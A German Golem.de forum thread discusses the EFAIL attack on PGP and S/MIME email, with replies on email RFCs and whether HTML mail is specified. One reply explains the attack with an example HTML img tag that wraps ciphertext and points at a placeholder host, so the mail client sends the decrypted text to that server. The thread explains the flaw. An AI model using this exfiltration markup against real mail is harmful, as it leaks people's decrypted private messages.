1. Foren
  2. Kommentare
  3. Security
  4. Alle Kommentare zum Artikel
  5. › PGP/SMIME: Angreifer können sich…

Fragen zum Ablauf und Informationsgewinn für das Selbststudium

  1. Thema

Neues Thema Ansicht wechseln


  1. Fragen zum Ablauf und Informationsgewinn für das Selbststudium

    Autor: an0815 14.05.18 - 18:37

    Kann mir Anfänger jemand erklären, wo ich die Informationen etc., z.B. wie sich die Kommunikation des Clients etc. verhält ( iframe etc.) ? Stehen diese in einen RFC etc. .
    Oder das Verhalten von HTML-Mails etc. ?
    Da ich überhaupt keine Ahnung habe und wohl auch unfähig bin zu googlen würde ich mich über hilfreiche Antworten freuen.

    Danke im voraus.

    Da ich nicht soviel Ahnung, habe ist meine Frage wohl nicht ganz verständlich, aber ich hoffe es ist für jemanden möglich diese zu verstehen.

  2. Re: Fragen zum Ablauf und Informationsgewinn für das Selbststudium

    Autor: WilliWerWolf 14.05.18 - 19:32

    an0815 schrieb:
    --------------------------------------------------------------------------------
    > Kann mir Anfänger jemand erklären, wo ich die Informationen etc., z.B. wie
    > sich die Kommunikation des Clients etc. verhält ( iframe etc.) ? Stehen
    > diese in einen RFC etc. .

    Richtig! Gib in die Suchmaschine Deines Vertrauens einfach mal "email RFC" ein!. Duckduckgo nennt auf der ersten Seite schon 822, 2821 und 2822.

    > Oder das Verhalten von HTML-Mails etc. ?

    HTML-Mail ist nicht genormt.

  3. Re: Fragen zum Ablauf und Informationsgewinn für das Selbststudium

    Autor: hab (Golem.de) 14.05.18 - 19:35

    an0815 schrieb:
    --------------------------------------------------------------------------------
    > Oder das Verhalten von HTML-Mails etc. ?

    Tatsächlich habe ich mir diese Frage auch gestellt. Ich denke es ist die richtige Frage. Und die Antwort ist wohl auch tatsächlich: HTML-Mails sind nirgendwo spezifiziert und jeder Mailclient macht was er für richtig hält.

    So sehr ich denke die Lücke zeigt einen Bug in der Spezifikation von S/MIME und PGP: Sie zeigt hier mit Sicherheit auch eine Lücke - und mangelhafte Klarheit - bei der Verarbeitung von HTML-Mails.

  4. Re: Fragen zum Ablauf und Informationsgewinn für das Selbststudium

    Autor: Spaghetticode 14.05.18 - 20:13

    Wie auf https://www.efail.de/ anschaulich beschrieben, wird ein HTML-Dokument um den verschlüsselten Text gebaut.

    Beispiel:
    <img src="https://www.example.com/12345/
    [verschlüsselter Text]
    ">

    Der E-Mail-Client entschlüsselt den Text:
    <img src="https://www.example.com/12345/
    [entschlüsselter Text]
    ">

    Anschließend rendert er die E-Mail und versucht, ein Bild von https://www.example.com/12345/[entschlüsselter Text] zu laden. Der Webserver speichert die ID 12345 (zugeordnet zur konkreten E-Mail) und den mitgelieferten Text und liefert ein Alibi-Bild aus.

    Den Angriff kann auch mit einem Hyperlink oder einem Formularelement durchgeführt werden.

    Ein anderer Angriffsvektor ist, den HTML-Code in den verschlüsselten Text zu „schmuggeln“, was möglich wird, wenn der Angreifer Teile vom Klartext kennt.

  5. Re: Fragen zum Ablauf und Informationsgewinn für das Selbststudium

    Autor: freebyte 15.05.18 - 01:25

    hannob (golem.de) schrieb:
    --------------------------------------------------------------------------------
    > Tatsächlich habe ich mir diese Frage auch gestellt. Ich denke es ist die
    > richtige Frage. Und die Antwort ist wohl auch tatsächlich: HTML-Mails sind
    > nirgendwo spezifiziert und jeder Mailclient macht was er für richtig hält.

    Mit Verlaub, aber es ist Wunschdenken dass das Problem an unzureichenden Specs liegt.

    Wenn in der E-Mail steht "Content-Type: text/html" ist der Kram als HTML zu rendern und darzustellen - da gibt es keine Definitionsprobleme.

    > So sehr ich denke die Lücke zeigt einen Bug in der Spezifikation von S/MIME
    > und PGP: Sie zeigt hier mit Sicherheit auch eine Lücke - und mangelhafte
    > Klarheit - bei der Verarbeitung von HTML-Mails.

    Keineswegs, es ist alles in Ordnung: PGP Entschlüsselt und wirft das Ergebnis dem HTML-Renderer vor die Füße.

    Wenn die Sicherheitseinstellungen der Renderengine es erlauben, fremde Inhalte nachzuladen hat man halt eines der vielen Probleme, die HTML in E-Mails so mit sich bringt.

    *DAS* jetzt PGP als Fehler vorzuwerfen ist eher unklug.

    fb

  6. Re: Fragen zum Ablauf und Informationsgewinn für das Selbststudium

    Autor: Quantium40 15.05.18 - 04:06

    hannob (golem.de) schrieb:
    > Tatsächlich habe ich mir diese Frage auch gestellt. Ich denke es ist die
    > richtige Frage. Und die Antwort ist wohl auch tatsächlich: HTML-Mails sind
    > nirgendwo spezifiziert und jeder Mailclient macht was er für richtig hält.

    Prinzipiell ist das schon recht ordentlich spezifiziert.
    RFC 2045-2049 definieren, wie per MIME die Mail in unterschiedliche Blöcke aufgeteilt wird. Die Behandlung der Blöcke erfolgt danach gemäß ihres Content-Types.
    Im Falle von Content-type: text/html hat der entsprechende Block als Text im HTML-Format interpretiert zu werden. Wie das geht, gibt das W3C vor.

    Bei dem aktuell aufgefallenen Bug ist das eigentliche Problem, dass das Containerformat (MIME) nicht sauber vom Inhalt getrennt wird.

    Würde das getan, würden Entschlüsselungsfunktionen die Crypto-Payload im HTML-Tag entweder gar nicht zu Gesicht bekommen, weil das einem text/html-Block zugeordnet wäre oder aber sie würden den verschlüsselten Block zwar sehen und entschlüsseln aber nicht ausleiten können, weil er nicht an den HTML-Renderer gegeben wird, sondern z.B. als Anhang angezeigt würde.

  7. Re: Fragen zum Ablauf und Informationsgewinn für das Selbststudium

    Autor: Auspuffanlage 21.05.18 - 13:01

    an0815 schrieb:
    --------------------------------------------------------------------------------
    > Kann mir Anfänger jemand erklären, wo ich die Informationen etc., z.B. wie
    > sich die Kommunikation des Clients etc. verhält ( iframe etc.) ? Stehen
    > diese in einen RFC etc. .
    > Oder das Verhalten von HTML-Mails etc. ?
    > Da ich überhaupt keine Ahnung habe und wohl auch unfähig bin zu googlen
    > würde ich mich über hilfreiche Antworten freuen.
    >
    > Danke im voraus.
    >
    > Da ich nicht soviel Ahnung, habe ist meine Frage wohl nicht ganz
    > verständlich, aber ich hoffe es ist für jemanden möglich diese zu
    > verstehen.

    Hi ich interpretiere das mal so, dass du wissen willst wo es diese Informationen gibt.

    Hier kannst du nach allen rfc suchen
    https://www.ietf.org/standards/rfcs/

    Hier die Info was rfc sind
    https://www.elektronik-kompendium.de/sites/net/0904121.htm

    Für E-Mail wäre dieser Artikel auch interessant
    https://www.elektronik-kompendium.de/sites/net/0902261.htm

    Ich hoffe ich konnte dir etwas weiterhelfen und deine frage richtig beantworten :)

  1. Thema

Neues Thema Ansicht wechseln


Um zu kommentieren, loggen Sie sich bitte ein oder registrieren Sie sich. Sie müssen ausserdem in Ihrem Account-Profil unter Forum einen Nutzernamen vergeben haben. Zum Login

Stellenmarkt
  1. Hays AG, Ansbach
  2. Eurowings Aviation GmbH, Köln
  3. HxGN Safety & Infrastructure GmbH, Ismaning bei München
  4. neam IT-Services GmbH, Frankfurt, Wiesbaden

Golem pur
  • Golem.de ohne Werbung nutzen

Anzeige
Mobile-Angebote
  1. 499,90€
  2. 326,74€
  3. 206,10€ (mit Rabattcode "PFIFFIGER" - Bestpreis!)


Haben wir etwas übersehen?

E-Mail an news@golem.de


Zenbook Flip UX371E im Test: Asus steht sich selbst im Weg
Zenbook Flip UX371E im Test
Asus steht sich selbst im Weg

Das Asus Zenbook Flip UX371E verbindet eines der besten OLED-Displays mit exzellenter Tastatur-Trackpad-Kombination. Wäre da nicht ein Aber.
Ein Test von Oliver Nickel

  1. Vivobook S14 S433 und S15 S513 Asus bringt Tiger-Lake-Notebooks ab 700 Euro
  2. Asus Expertbook P1 350-Euro-Notebook tauscht gutes Display gegen gesteckten RAM
  3. Asus Zenfone 7 kommt mit Dreifach-Klappkamera

Futuristische Schwebebahn im Testbetrieb: Verkehrsmittel der Zukunft für die dritte Dimension
Futuristische Schwebebahn im Testbetrieb
Verkehrsmittel der Zukunft für die dritte Dimension

Eine Schwebebahn für die Stadt, die jeden Passagier zum Wunschziel bringt - bequem, grün, ohne Stau und vielleicht sogar kostenlos. Ist das realistisch?
Ein Bericht von Werner Pluta

  1. ÖPNV Infraserv Höchst baut Wasserstofftankstelle für Züge

PC-Hardware: Warum Grafikkarten derzeit schlecht lieferbar sind
PC-Hardware
Warum Grafikkarten derzeit schlecht lieferbar sind

Eine RTX 3000 oder eine RX 6000 zu bekommen, ist schwierig: Eine hohe Nachfrage trifft auf Engpässe - ohne Entspannung in Sicht.
Eine Analyse von Marc Sauter

  1. Instinct MI100 AMDs erster CDNA-Beschleuniger ist extrem schnell
  2. Hardware-accelerated GPU Scheduling Besseres VRAM-Management unter Windows 10